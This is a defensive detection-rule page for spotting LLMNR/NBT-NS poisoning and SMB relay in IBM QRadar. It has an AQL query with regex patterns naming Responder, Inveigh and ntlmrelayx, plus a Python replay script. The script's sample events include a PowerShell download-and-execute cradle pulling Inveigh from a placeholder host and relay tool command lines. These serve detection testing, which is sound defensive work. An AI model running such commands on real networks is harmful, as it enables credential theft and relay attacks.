Detect LLMNR/NBT-NS Poisoning and SMB Relay in IBM QRadar

Adversaries may spoof an authoritative source for name resolution to force communication with an adversary-controlled system, collecting or relaying authentication materials. By responding to LLMNR (UDP 5355) and NBT-NS (UDP 137) queries, attackers poison name resolution so that victims authenticate to the adversary system, capturing NTLMv1/v2 hashes for offline cracking or relay attacks. Captured hashes may be relayed directly to SMB, LDAP, MSSQL, or HTTP services to authenticate as the victim without ever cracking the hash. Tools such as Responder, Inveigh, Impacket ntlmrelayx, and NBNSpoof are commonly used. Threat actors including Lazarus Group and Wizard Spider have used this technique for credential collection and lateral movement.

MITRE ATT&CK

Tactic: Credential Access, Collection
Technique: T1557 Adversary-in-the-Middle
Sub-technique: T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay
Canonical reference: https://attack.mitre.org/techniques/T1557/001/

QRadar Detection Query

IBM QRadar (QRadar)

```sql
SELECT
  DATEFORMAT(deviceTime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  devicehostname AS host,
  username,
  sourceip,
  "Process Image" AS process_image,
  "Process CommandLine" AS command_line,
  "Parent Process Image" AS parent_image,
  QIDNAME(qid) AS event_name,
  CATEGORYNAME(category) AS category_name
FROM events
WHERE
  (
    LOWER("Process Image") MATCHES '(?i).*(responder\.exe|inveigh\.exe|ntlmrelayx\.exe|smbrelayx\.exe|multirelay\.exe|nbnspoof\.exe|conveigh\.exe).*'
    OR LOWER("Process CommandLine") MATCHES '(?i).*(responder|inveigh|invoke-inveigh|ntlmrelayx|smbrelayx|multirelay|nbnspoof|llmnr_response|-rpv|inveigh-unprivileged).*'
    OR (
      LOWER("Process Image") MATCHES '(?i).*python[23]?\.exe'
      AND LOWER("Process CommandLine") MATCHES '(?i).*(responder|inveigh|ntlmrelayx|smbrelayx|multirelay|nbnspoof|llmnr_response).*'
    )
  )
ORDER BY deviceTime DESC
LAST 24 HOURS
```

Severity: high · Confidence: high

Detects execution of LLMNR/NBT-NS poisoning and SMB relay tooling in IBM QRadar AQL using Windows Sysmon process creation events (Event ID 1). It relies on the custom properties populated by the Windows Sysmon DSM: 'Process Image' (path of the launched process), 'Process CommandLine', and 'Parent Process Image'. Coverage includes direct execution of the tool binaries, Python-based Impacket variants, and command-line keyword indicators for the Responder, Inveigh, ntlmrelayx, smbrelayx, and NBNSpoof toolsets. Two AQL specifics matter when adapting the query: MATCHES compares the regular expression against the whole field value (Java String.matches semantics), so a substring pattern must be wrapped in leading and trailing .* to hit a full path or command line, and the LAST time clause closes the statement after ORDER BY. Custom property field names may differ by QRadar deployment — verify in Administration > Custom Properties.

Data Sources

IBM QRadar with:
  • Microsoft Windows Sysmon DSM (LOGSOURCETYPEID 141)
  • Windows Security Event Log DSM (LOGSOURCETYPEID 12)

Required Tables

events (QRadar normalized event store with custom properties 'Process Image', 'Process CommandLine', and 'Parent Process Image' populated by Sysmon DSM)

False Positives & Tuning

  • Authorized penetration testers running Responder or ntlmrelayx from whitelisted source IPs or known service accounts during documented assessment windows — add sourceip or username exclusions to the WHERE clause.
  • Python-based internal automation or scripting tools whose argument strings contain overlapping terms such as 'responder' (HTTP response callback classes), 'relay' (event relay services), or 'inveigh' for unrelated logic.
  • Security awareness simulation platforms that spawn poisoning tool processes in controlled lab environments forwarding logs to the production QRadar instance.
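To make the WHERE clause and the tuning advice above concrete, the following Python script is an added example (not part of this rule page and not IBM code): it replays the rule's regular expressions over a handful of constructed Sysmon Event ID 1 records, emulating AQL MATCHES as a whole-string match, and then applies the sourceip/username exclusions suggested in the tuning list. The ProcessEvent type, the run_detection helper and all sample hosts, users, IPs and command lines are assumptions made up for the demonstration; it also shows why the alternations must be wrapped in .* under whole-string semantics.

```python
"""Offline replay of the T1557.001 AQL detection logic (added example)."""
import re
from dataclasses import dataclass

# Regex bodies taken from the AQL rule. They are wrapped in '.*' at use time
# because AQL MATCHES behaves like Java String.matches(): the expression has
# to consume the entire field value, so a bare alternation never matches a
# full process path or command line.
TOOL_IMAGE = r'(responder\.exe|inveigh\.exe|ntlmrelayx\.exe|smbrelayx\.exe|multirelay\.exe|nbnspoof\.exe|conveigh\.exe)'
TOOL_CMDLINE = r'(responder|inveigh|invoke-inveigh|ntlmrelayx|smbrelayx|multirelay|nbnspoof|llmnr_response|-rpv|inveigh-unprivileged)'
PY_IMAGE = r'python[23]?\.exe'
PY_CMDLINE = r'(responder|inveigh|ntlmrelayx|smbrelayx|multirelay|nbnspoof|llmnr_response)'


def aql_matches(regex: str, value: str) -> bool:
    """Emulate AQL MATCHES on LOWER(field): case-insensitive, whole-string match."""
    return re.fullmatch(regex, value.lower(), flags=re.IGNORECASE) is not None


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 record the rule reads (hypothetical type)."""
    host: str
    username: str
    sourceip: str
    image: str          # 'Process Image' custom property
    command_line: str   # 'Process CommandLine' custom property


def matches_rule(ev: ProcessEvent) -> bool:
    """Mirror the three OR branches of the AQL WHERE clause."""
    return (
        aql_matches(f'.*{TOOL_IMAGE}.*', ev.image)
        or aql_matches(f'.*{TOOL_CMDLINE}.*', ev.command_line)
        or (aql_matches(f'.*{PY_IMAGE}', ev.image)
            and aql_matches(f'.*{PY_CMDLINE}.*', ev.command_line))
    )


def run_detection(events, allowed_ips=frozenset(), allowed_users=frozenset()):
    """Return the events that fire after the tuning exclusions
    (the sourceip / username exclusions recommended above)."""
    users = {u.lower() for u in allowed_users}
    return [
        ev for ev in events
        if matches_rule(ev)
        and ev.sourceip not in allowed_ips
        and ev.username.lower() not in users
    ]


def unwrapped_pattern_hits(events) -> int:
    """Count image hits if TOOL_IMAGE were used without '.*' wrapping.
    Under whole-string semantics this is zero for any real path: the bug to avoid."""
    return sum(1 for ev in events if aql_matches(TOOL_IMAGE, ev.image))


# Constructed telemetry for the demo; none of this is real log data.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "CORP\\alice", "10.0.0.21",
                 r"C:\Python311\python3.exe",
                 "python3.exe Responder.py -I Ethernet0 -rPv"),
    ProcessEvent("ws02", "CORP\\bob", "10.0.0.22",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -c IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://EXAMPLE-PLACEHOLDER/Inveigh.ps1'); Invoke-Inveigh"),
    ProcessEvent("pentest01", "CORP\\svc-redteam", "10.9.9.9",   # authorised assessment host
                 r"C:\Tools\ntlmrelayx.exe",
                 "ntlmrelayx.exe -t smb://127.0.0.1"),
    ProcessEvent("build01", "CORP\\ci", "10.0.0.50",             # benign 'responder' keyword
                 r"C:\Python311\python.exe",
                 "python.exe api_server.py --handler JsonResponder"),
    ProcessEvent("ws03", "CORP\\carol", "10.0.0.23",
                 r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    print("untuned hits:", [ev.host for ev in run_detection(SAMPLE_EVENTS)])
    tuned = run_detection(SAMPLE_EVENTS, allowed_ips={"10.9.9.9"}, allowed_users={"CORP\\ci"})
    print("tuned hits:  ", [ev.host for ev in tuned])
    print("hits without .* wrapping:", unwrapped_pattern_hits(SAMPLE_EVENTS))
```

Untuned, four of the five sample events fire, including the authorised pentest host and the CI job whose argument merely contains "JsonResponder"; the two exclusions reduce that to the two workstation events. The unwrapped count stays at zero, which is the failure mode a rule author hits when porting substring-style regexes from other SIEMs into AQL without the .* wrapping.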
Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Invoke-Inveigh LLMNR and NBT-NS Poisoning via PowerShell

    Expected signal: Sysmon Event ID 1: powershell.exe with CommandLine containing 'Invoke-Inveigh', 'Net.WebClient', and 'DownloadString'. Sysmon Event ID 3: PowerShell process binding/connecting on UDP 5355 and UDP 137. PowerShell ScriptBlock Log Event ID 4104 capturing the full Inveigh module code and runtime output. Sysmon Event ID 22 (DNS Query) for the GitHub download request.

  2. Test 2: Responder Python Execution in Analyze Mode

    Expected signal: Sysmon Event ID 1: python3.exe with CommandLine containing 'Responder.py' and '-I'. Sysmon Event ID 3: python3.exe binding on UDP 5355 (LLMNR) and UDP 137 (NBT-NS). DeviceNetworkEvents: InitiatingProcessFileName=python3.exe with LocalPort=5355 or 137. DeviceProcessEvents: FileName=python3.exe, ProcessCommandLine contains 'Responder'.

  3. Test 3: Impacket ntlmrelayx Relay Tool Execution Against Loopback Target

    Expected signal: Sysmon Event ID 1: python3.exe with CommandLine containing 'ntlmrelayx.py', '-t', and 'smb://'. Sysmon Event ID 3: python3.exe attempting TCP connection to 127.0.0.1:445. DeviceProcessEvents: FileName=python3.exe, ProcessCommandLine contains 'ntlmrelayx'. Connection will fail (no SMB listener on loopback) but all process creation telemetry fires.

  4. Test 4: Disable LLMNR and NBT-NS via Registry — Defensive Control Validation

    Expected signal: Sysmon Event ID 13 (Registry Value Set): HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast set to DWORD 0. Sysmon Event ID 1: powershell.exe with CommandLine containing 'Win32_NetworkAdapterConfiguration' and 'SetTcpipNetbios'. Security Event ID 4657 (if Object Access auditing enabled): registry key modification logged.
